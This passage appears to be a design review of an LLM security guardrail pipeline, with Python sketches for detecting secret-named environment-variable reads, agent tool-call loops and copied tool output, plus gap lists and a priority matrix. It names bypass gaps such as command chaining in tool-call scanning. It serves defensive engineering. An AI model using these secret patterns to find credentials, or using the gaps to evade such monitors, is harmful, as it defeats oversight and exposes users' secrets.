- Missing: Config file secret references. `config.yaml`, `secrets.json`, `credentials.xml` references in generated code.
- Missing: Rust/Go/Java env var patterns. `std::env::var("SECRET")`, `os.Getenv("API_KEY")`, `System.getenv("DB_PASSWORD")`.
- Improvement: Detect secrets embedded in code. Not env vars but hardcoded secrets: `api_key = "sk-..."` in generated code.
Priority: LOW (current coverage handles the most common languages)
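The Rust, Go, and Java calls quoted above translate directly into regex patterns. In this sketch `ENV_PATTERNS`, `SECRET_KEYWORDS`, and `env_var_reads` are hypothetical names, and the keyword list is illustrative rather than the step's actual list.

```python
import re

NAME = r'"([A-Za-z_][A-Za-z0-9_]*)"'
ENV_PATTERNS = {
    "rust": re.compile(r"std::env::var\(\s*" + NAME + r"\s*\)"),
    "go": re.compile(r"os\.Getenv\(\s*" + NAME + r"\s*\)"),
    "java": re.compile(r"System\.getenv\(\s*" + NAME + r"\s*\)"),
}
SECRET_KEYWORDS = ("SECRET", "KEY", "PASSWORD", "TOKEN")  # illustrative


def env_var_reads(code):
    """Return (language, variable) pairs for env var reads with secret-like names."""
    hits = []
    for lang, pattern in ENV_PATTERNS.items():
        for match in pattern.finditer(code):
            name = match.group(1)
            if any(keyword in name.upper() for keyword in SECRET_KEYWORDS):
                hits.append((lang, name))
    return hits
```

Reads of harmless variables such as `HOME` are ignored, mirroring the safe var exclusion the step already applies to other languages.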
20. loop_guard. Loop Guard
Current: Per-session tracking, identical call counting, warning injection, circuit breaking, max total calls.
Strengths: Warning before blocking is good UX. Max total calls prevents cost runaway.
Gaps & Recommendations:
- Missing: Semantic loop detection. Agent calls `search("AI market")` then `search("AI market trends")` then `search("market for AI")`: different strings, same intent. Use embedding similarity to detect semantic loops.
- Missing: Progress tracking. A legitimate agent might call the same tool 10 times with different params (iterating over a list). Detect lack of progress rather than just repetition.
- Improvement: Cross-session loop detection. If an agent hits the loop limit, gets restarted, and immediately loops again, detect the meta-loop.
Priority: LOW (current implementation handles the common case well)
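Embedding similarity needs a model, so the sketch below substitutes token-set Jaccard overlap as a dependency-free stand-in. It is weaker than embeddings (synonyms are missed) but catches the reordered-query example from the text. The function names and the default thresholds are hypothetical.

```python
def token_set(query):
    return set(query.lower().split())


def jaccard(a, b):
    """Size of the intersection divided by size of the union."""
    union = a | b
    return len(a & b) / len(union) if union else 1.0


def looks_like_loop(queries, threshold=0.5, min_repeats=3):
    """True if the latest query overlaps heavily with enough earlier ones."""
    if not queries:
        return False
    latest = token_set(queries[-1])
    similar = sum(
        1 for q in queries[:-1] if jaccard(latest, token_set(q)) >= threshold
    )
    # Count the latest query itself as one occurrence.
    return similar + 1 >= min_repeats
```

Swapping `jaccard` for cosine similarity over embeddings would keep the same control flow while handling paraphrases.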
21. dedup_output. Output Dedup
Current: Exact + normalized matching against tool results and input. Configurable min length.
Strengths: Catches the common “LLM copies tool output verbatim” failure mode.
Gaps & Recommendations:
- Missing: Partial dedup. LLM copies 80% of tool output with minor modifications. Current implementation only catches exact/normalized matches.
- Improvement: Token-based dedup. Measure output tokens that are direct copies of input tokens. If >70% are copies, flag it. More robust than string matching.
Priority: LOW (nice-to-have, not security-critical)
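A token-based copy ratio can be estimated with `difflib` from the standard library. The sketch below splits on whitespace, which is an assumption; a real implementation might use model tokens instead. `copied_fraction` is a hypothetical name.

```python
from difflib import SequenceMatcher


def copied_fraction(output, source):
    """Fraction of output tokens that align, in order, with tokens in the source."""
    out_tokens, src_tokens = output.split(), source.split()
    if not out_tokens:
        return 0.0
    matcher = SequenceMatcher(None, src_tokens, out_tokens, autojunk=False)
    # Matching blocks are the aligned runs shared by both token sequences.
    copied = sum(block.size for block in matcher.get_matching_blocks())
    return copied / len(out_tokens)
```

An output that changes one word in a nine-word tool result scores about 0.89, above the 70% threshold suggested in the text, so it would be flagged even though exact matching misses it.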
Cross-Cutting Gaps (Not in Any Single Step)
A. Observability & Metrics
- Missing: Prometheus/OpenTelemetry metrics export. Step latency histograms, detection counts by type, block rates. Essential for production monitoring.
- Missing: Detection trend dashboards. “Injection attempts increased 300% this week.” Time-series analysis of security events.
B. Testing & Validation
- Missing: Red team automation. Built-in adversarial testing that runs the HackAPrompt, Gandalf, and custom attack datasets against the pipeline. Giskard provides this.
- Missing: Regression testing. When a pattern is updated, automatically verify it still catches known attacks and doesn’t introduce new FPs.
C. Response to Detection
- Missing: Automated incident response. When a high-severity detection occurs, automatically: revoke agent API key, notify CISO via webhook, quarantine conversation. Currently all responses are per-request.
- Missing: Adaptive security posture. If injection attempts increase, automatically tighten thresholds across the pipeline. Return to normal after the attack subsides.
D. Privacy & Compliance
- Missing: Data minimization. GDPR requires processing only necessary data. Log and store only what’s needed. Currently audit logs may contain more data than necessary.
- Missing: Right to erasure. GDPR Article 17. Ability to delete all data for a specific user across audit logs, pipeline state, and findings.
- Missing: Data Processing Agreement (DPA) enforcement. When routing to an LLM provider, verify the provider has a valid DPA. Block calls to non-compliant providers.
Priority Matrix
| Priority | Steps / Gaps | Impact |
|---|---|---|
| CRITICAL | ML-based injection classifier | Catches novel attacks regex never will |
| HIGH | Multimodal input validation | Vision models are becoming default |
| HIGH | EU multi-language PII | Core positioning as European product |
| HIGH | Secret verification | Transforms FYI into actionable alert |
| HIGH | Tool definition integrity | MCP supply chain attacks are growing |
| HIGH | Toxicity/content safety | Required by EU AI Act |
| HIGH | Command chaining in scan_tool_calls | Common bypass technique |
| HIGH | Tool execution sandboxing | #1 missing capability for agents |
| MEDIUM | Adaptive rate limiting | Threat-responsive defense |
| MEDIUM | Per-model budget splits | Most requested by CISOs |
| MEDIUM | Custom classification rules | Enterprise customization |
| MEDIUM | Streaming LLM support | Developer experience |
| MEDIUM | Multi-step taint propagation | Agentic workflow security |
| MEDIUM | Time-based permissions | Enterprise IAM standard |
| MEDIUM | Cloud resource ID detection | Common infrastructure leak |
| LOW | Semantic loop detection | Nice-to-have |
| LOW | Additional shell bleed languages | Diminishing returns |
| LOW | Unicode script allowlists | Current impl is strong |
| LOW | Partial dedup | Not security-critical |